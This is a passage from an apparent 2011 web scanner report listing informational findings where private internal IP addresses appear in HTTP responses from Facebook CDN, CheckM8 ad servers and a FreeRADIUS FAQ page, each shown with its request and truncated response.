Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Expires: Sat, 17 Sep 2011 01:57:28 GMT
Date: Sat, 17 Sep 2011 00:57:28 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

21.11. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQCY8lmUcO2YgrAS&url=http%3A%2F%2Fcdn.video.abc.com%2Fabcvideo%2Fvideo_fep%2Fthumbnails%2F220x124%2FBCP_207_BCP207part1_episode_c86279b7-1896-4402-9b26-c7eaf6b8f43e_3917597_220x124.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.43.107.37
X-Cnection: close
Content-Length: 8778
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Expires: Sat, 17 Sep 2011 01:57:28 GMT
Date: Sat, 17 Sep 2011 00:57:28 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

21.12. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQBA_RpVNZTCHt5C&url=http%3A%2F%2Fcdn.video.abc.com%2Fvideo%2Fthumbnails%2F117x66%2FMDF_2011080008_MDFPremiereBTS_BehindTheScenes_HD1080p_a92ae76c-dbf0-4c83-b1d7-fc990cc7509b_3919181.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.55.18.34
X-Cnection: close
Content-Length: 3555
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Expires: Sat, 17 Sep 2011 01:57:28 GMT
Date: Sat, 17 Sep 2011 00:57:28 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

21.13. http://external.ak.fbcdn.net/safe_image.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /safe_image.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /safe_image.php?d=AQArfaA8YFh-mNgS&url=http%3A%2F%2Fcdn.video.abc.com%2Fabcvideo%2Fvideo_fep%2Fthumbnails%2F220x124%2FNEWS_20110913_JackieOpt1_episode_3c88ec8a-3087-425d-af6f-e494abfdf426_3920741_220x124.jpg HTTP/1.1
Host: external.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/activity.php?site=abc.go.com&width=274&height=406&header=false&colorscheme=light&font=tahoma&recommendations=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
X-FB-Server: 10.54.174.60
X-Cnection: close
Content-Length: 5139
Vary: Accept-Encoding
Cache-Control: public, max-age=3600
Expires: Sat, 17 Sep 2011 02:02:58 GMT
Date: Sat, 17 Sep 2011 01:02:58 GMT
Connection: close

......JFIF.............>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default quality
...C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!2222222222222222222222222222
...[SNIP]...

21.14. http://freeradius.org/faq/cistron.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://freeradius.org
Path:   /faq/cistron.html

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /faq/cistron.html HTTP/1.1
Host: freeradius.org
Proxy-Connection: keep-alive
Referer: http://www.radius.cistron.nl/faq/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74731205.2134826601.1316220336.1316220336.1316220336.1; __utmb=74731205; __utmc=74731205; __utmz=74731205.1316220336.1.1.utmccn=(referral)|utmcsr=blekko.com|utmcct=/ws/radius+server|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:47:56 GMT
Server: Apache/2.2.8 (Ubuntu) mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Tue, 12 Jul 2011 19:09:47 GMT
ETag: "8740b1-9c81-4a7e40b12b4c0"
Accept-Ranges: bytes
Content-Length: 40065
Content-Type: text/html

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<HTML>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Perl">
   <met
...[SNIP]...
255.255.

For example, the following entries do almost the same on most NASes:

   user    Auth-Type = Local, Password = "blegh"
       Service-Type = Framed-User,
       Framed-Protocol = PPP,
       Framed-IP-Address = 192.168.5.78,
       Framed-IP-Netmask = 255.255.255.240

   user    Auth-Type = Local, Password = "blegh"
       Service-Type = Framed-User,
       Framed-Protocol = PPP,
       Framed-IP-Address = 192.168.5.78,
       Framed-Route = "192.168.5.64/28 0.0.0.0 1"

The result is that the end user gets IP address 192.168.5.78 and that
the whole network with IP addresses 192.168.5.64 - 195.64.5.79 is
routed over the PPP link to the user (see the Radius RFCs for the
exact syntax of the Framed-Route attribute).


<HR>
...[SNIP]...

21.15. http://q1.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/detect?cat=Boston_Herald.Track.Front&page=2865972011350095&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=14322905940935016&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9w5TX53vENT06Sba; C=o0Z7X9wtT9UGdhaMa4OQ95t; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:06:08 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.213.15 PA-AD5
Set-cookie: A=dvV7X9w7R98LvENT06Sba;Path=/;
Set-cookie: C=oi17X9w000YTchaNa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:39:28 GMT;
x-internal-browser: CH0
x-internal-id: 141548966/1215292935/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

21.16. http://q1.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/detect?cat=Boston_Herald.News.Front&page=4783091980498284&serial=1000:1:A&&LOC=http://bostonherald.com/news/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=45216156262904406&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9w4IV7MvENT06Sba; C=oPY7X9wdIMXUcgaKa4OQ95t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:04 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=ohZ7X9wdIMXUcgaLa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:37:23 GMT;
x-internal-browser: CH0
x-internal-id: 143308353/1217052926/1137740046/2570514078
x-internal-selected:
x-internal-data: TCPV<38660>,RMCPV<38660>,TCPV<29217>,RMCPV<29217>,TCPV<29211>,RMCPV<29211>,TCPV<29210>,RMCPV<29210>,TCPV<27351>,RMCPV<27351>,TCPV<0>,RMCPV<0>,CAVPV<38660 32 0>,CAVPV<38660 34 10>,CAVPV<38660 43 3>,CAVPV<38660 103 21>,CAVPV<38660 104 12>,CAVPV<38660 111 8>,CG:O<38660 116 225>,CAVPV<38660 116 225>,CG:O<29217 116 225>,CG:O<29211 116 225>,CG:O<29210 116 225>,CG:O<27351 116 225>,CG:O<0 116 225>,CG:O<38660 117 225024>,CAVPV<38660 117 225024>,CG:O<29217 117 225024>,CG:O<29211 117 225024>,CG:O<29210 117 225024>,CG:O<27351 117 225024>,CG:O<0 117 225024>,CAVPV<38660 118 1>,CAVPV<38660 120 4000000005>,CAVPV<38660 122 4225024005>,CAVPV<38660 280 22>,CAVPV<38660 282 0>,CAVPV<38660 283 0>
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 1422
Connection: close
Content-Type: application/javascript

...(function(){
var CM8CE = (window.CM8E && CM8E['Boston_Herald.News.Front']) || {};
var CM8CES = (CM8CE.serialsData && CM8CE.serialsData[1000]) || {};
if (CM8CE.requestReceived)
   CM8CE.requestReceiv
...[SNIP]...

21.17. http://q1.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/detect?cat=Boston_Herald.Track.Front&page=6802504919469357&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=6767618621233851&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9wOL36ZvENT06Sba; C=ouX7X9wuHKW7cgaJa4OQ95t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:27:43 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.17 NY-AD7
Set-cookie: A=dvV7X9w3O5HVvENT06Sba;Path=/;
Set-cookie: C=oaR8X9wGFM22cgavb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:01:02 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 158382442/1232146763/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

21.18. http://q1.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/detect?cat=Boston_Herald.Entertainment.Front&page=18811660935170949&serial=1000:1:A&&LOC=http://bostonherald.com/entertainment/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=25668649072758853&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/entertainment/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca; A=dvV7X9w4IV7MvENT06Sba; C=ohZ7X9wdIMXUcgaLa4OQ95t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:04:49 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.19 ny-ad9
Set-cookie: A=dvV7X9w5TX53vENT06Sba;Path=/;
Set-cookie: C=o0Z7X9wtT9UGdhaMa4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:38:08 GMT;
Set-cookie: O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba;Path=/;Expires=Fri, 01-Feb-2075 04:38:08 GMT;
x-internal-browser: CH0
x-internal-id: 174574225/1248338003/1137740046/2570514078
x-internal-selected:
x-internal-data: TCPV<38664>,RMCPV<38664>,TCPV<29214>,RMCPV<29214>,TCPV<29211>,RMCPV<29211>,TCPV<29210>,RMCPV<29210>,TCPV<27351>,RMCPV<27351>,TCPV<0>,RMCPV<0>,CAVPV<38664 32 0>,CAVPV<38664 34 10>,CAVPV<38664 43 3>,CAVPV<38664 103 21>,CAVPV<38664 104 12>,CAVPV<38664 111 8>,CG:HDWMG<38664 116 225>,CAVPV<38664 116 225>,CG:HDWMG<29214 116 225>,CG:O<29211 116 225>,CG:O<29210 116 225>,CG:O<27351 116 225>,CG:O<0 116 225>,CG:HDWMG<38664 117 225024>,CAVPV<38664 117 225024>,CG:HDWMG<29214 117 225024>,CG:O<29211 117 225024>,CG:O<29210 117 225024>,CG:O<27351 117 225024>,CG:O<0 117 225024>,CAVPV<38664 118 1>,CAVPV<38664 120 4000000005>,CAVPV<38664 122 4225024005>,CAVPV<38664 280 22>,CAVPV<38664 282 0>,CAVPV<38664 283 0>
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 1431
Connection: close
Content-Type: application/javascript

...(function(){
var CM8CE = (window.CM8E && CM8E['Boston_Herald.Entertainment.Front']) || {};
var CM8CES = (CM8CE.serialsData && CM8CE.serialsData[1000]) || {};
if (CM8CE.requestReceived)
   CM8CE.requ
...[SNIP]...

21.19. http://q1.checkm8.com/adam/detect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /adam/detect

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/detect?cat=Boston_Herald.Track.Front&page=009300128789618611&serial=1000:1:A&&LOC=http://bostonherald.com/track/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=01&RES=RS21&ORD=061694151954725385&req=fr&& HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/track/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; A=dvV7X9wA5Q7MvENT06Sba; C=ovV7X9we5HXUcgaIa4OQ95t; O=evV7X9wkgMMSg3IdGwNbO0jnNbnU3Lca

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:19:56 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.16 NY-AD6
Set-cookie: A=dvV7X9w26KMRvENT06Sba;Path=/;
Set-cookie: C=oDJ8X9wX766Ycfabb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 04:53:15 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 151272795/1225017258/1137740046/2570514078
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

21.20. http://q1.checkm8.com/adam/report  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /adam/report

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/report?38660&6091093090362847&http://bostonherald.com/news/&1316221635&Y&32_0_34_10_43_3_103_21_104_12_111_8_116_225_117_225024_118_1_120_4000000005_122_4225024005_280_22_282_0_283_0_&T&P HTTP/1.1
Host: q1.checkm8.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=on27X9w000YTchaOa4OQ95t

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:49:42 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.17 NY-AD7
Set-cookie: A=dvV7X9wIT1IVvENT06Sba;Path=/;
Set-cookie: C=osH9X9wtHI32cganb4OQ95t;Path=/;Expires=Fri, 01-Feb-2075 05:23:02 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.q1.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 158434447/1232198946/1137740046/2570514078
x-internal-error: TOO OLD
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


21.21. http://q1digital.checkm8.com/adam/cm8adam_1_call.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1digital.checkm8.com
Path:   /adam/cm8adam_1_call.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /adam/cm8adam_1_call.js HTTP/1.1
Host: q1digital.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:04 GMT
Server: Apache
P3P: policyref="http://q1digital.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.213.15 PA-AD5
Age: 0
Cache-Control: max-age=3600
Vary: Accept-Encoding
Content-Length: 18958
Connection: close
Content-Type: application/javascript

// All rights reserved CheckM8 Inc. (c) 2009


if (typeof(window.CM8Page) == "undefined") {
   if (document.location && (document.location.search.indexOf('CM8Page=') != -1))
       window.CM8Page=document
...[SNIP]...

21.22. http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/zIlCz1LqxZw.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y2/r/zIlCz1LqxZw.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y2/r/zIlCz1LqxZw.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=374095054754&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18399f63c%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff31ad8ddd8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&id=205702799462197&locale=en_US&sdk=joey&show_faces=false&stream=false&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 16 Sep 2011 21:41:27 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 18610
Vary: Accept-Encoding
Cache-Control: public, max-age=31524990
Expires: Sat, 15 Sep 2012 21:53:57 GMT
Date: Sat, 17 Sep 2011 00:57:27 GMT
Connection: close

/*1316210004,169776065*/

form{margin:0;padding:0}
label{cursor:pointer;color:#666;font-weight:bold;vertical-align:middle}
label input{font-weight:normal}
textarea,.inputtext,.inputpassword{border:1px
...[SNIP]...

21.23. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/crmyyt8SyXy.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y_/r/crmyyt8SyXy.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y_/r/crmyyt8SyXy.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=374095054754&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df18399f63c%26origin%3Dhttp%253A%252F%252Fbeta.abc.go.com%252Ff31ad8ddd8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=62&id=205702799462197&locale=en_US&sdk=joey&show_faces=false&stream=false&width=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 16 Sep 2011 21:41:09 GMT
X-FB-Server: 10.30.148.191
X-Cnection: close
Content-Length: 22145
Vary: Accept-Encoding
Cache-Control: public, max-age=31524982
Expires: Sat, 15 Sep 2012 21:53:49 GMT
Date: Sat, 17 Sep 2011 00:57:27 GMT
Connection: close

/*1316209982,169776319*/

.async_throbber .async_saving{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif) no-repeat right;padding-right:20px}
.async_throbber_left .async_savi
...[SNIP]...

21.24. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/tRfGGwGuu8y.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ym/r/tRfGGwGuu8y.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ym/r/tRfGGwGuu8y.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/facepile.php?action=like&api_key=180186532021462&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22a9c1b6c%26origin%3Dhttp%253A%252F%252Fwww.bradsdeals.com%252Ff98e336e8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&extended_social_context=false&href=http%3A%2F%2Fwww.facebook.com%2Fbradsdeals&locale=en_US&login_text=&max_rows=1&sdk=joey&size=small&tense=past&width=200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 16 Sep 2011 20:52:47 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 13393
Vary: Accept-Encoding
Cache-Control: public, max-age=31521863
Expires: Sat, 15 Sep 2012 21:08:49 GMT
Date: Sat, 17 Sep 2011 01:04:26 GMT
Connection: close

/*1316207297,169775813*/

#captcha fieldset{border-top:1px solid #c0c0c0;border-bottom:1px solid #c0c0c0;margin:0;padding:10px}
#captcha legend{color:#808080}
#captcha .divider{display:none}
